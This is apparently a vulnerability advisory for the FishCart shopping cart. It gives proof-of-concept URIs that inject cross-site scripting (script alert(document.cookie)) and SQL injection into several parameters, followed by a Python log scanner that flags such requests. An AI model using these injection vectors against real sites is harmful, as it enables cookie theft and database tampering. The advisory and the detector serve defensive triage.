FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
An attacker can exploit these issues through a web client. The following proof-of-concept URIs are available:

http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=

http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=

http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=

http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script>

http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION

http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
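For triage, the script and parameter pairs in the URIs above can be checked against web server access logs. The following Python script is an added example, not part of the original advisory or of FishCart; the character heuristics, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script -> parameters targeted by the advisory's proof-of-concept URIs.
XSS_PARAMS = {"display.php": {"nlst"},
              "upstracking.php": {"trackingnum", "reqagree", "m"}}
SQLI_PARAMS = {"display.php": {"psku"}, "upstnt.php": {"cartid"}}
# Assumed heuristics: markup-breaking characters (XSS), a quote (SQL injection).
MARKUP = re.compile(r"[<>\"']")
QUOTE = re.compile(r"['\"]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2005:10:00:00 +0000] "GET /demo31/display.php'
    '?cartid=200505024231092&zid=1&lid=1&nlst=y&psku=AB-100 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [02/May/2005:10:00:05 +0000] "GET /demo31/upstracking.php'
    '?trackingnum=%27%22%3E%3Cb%3E&reqagree=checked&m= HTTP/1.1" 200 2048',
    '192.0.2.12 - - [02/May/2005:10:00:09 +0000] "GET /demo31/upstnt.php'
    '?zid=1&lid=1&cartid=%27x HTTP/1.1" 200 1024',
]


def classify(uri):
    """Return sorted (kind, script, param) findings for one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    # parse_qsl percent-decodes values, so %3Cb%3E is inspected as <b>.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in XSS_PARAMS.get(script, ()) and MARKUP.search(value):
            findings.add(("xss", script, name))
        if name in SQLI_PARAMS.get(script, ()) and QUOTE.search(value):
            findings.add(("sqli", script, name))
    return sorted(findings)


def scan(log_lines):
    """Return [(line_number, findings)] for log lines with a finding."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and (findings := classify(match.group(1))):
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A hit marks a request worth reviewing rather than a confirmed attack; a legitimate value containing an apostrophe would also match.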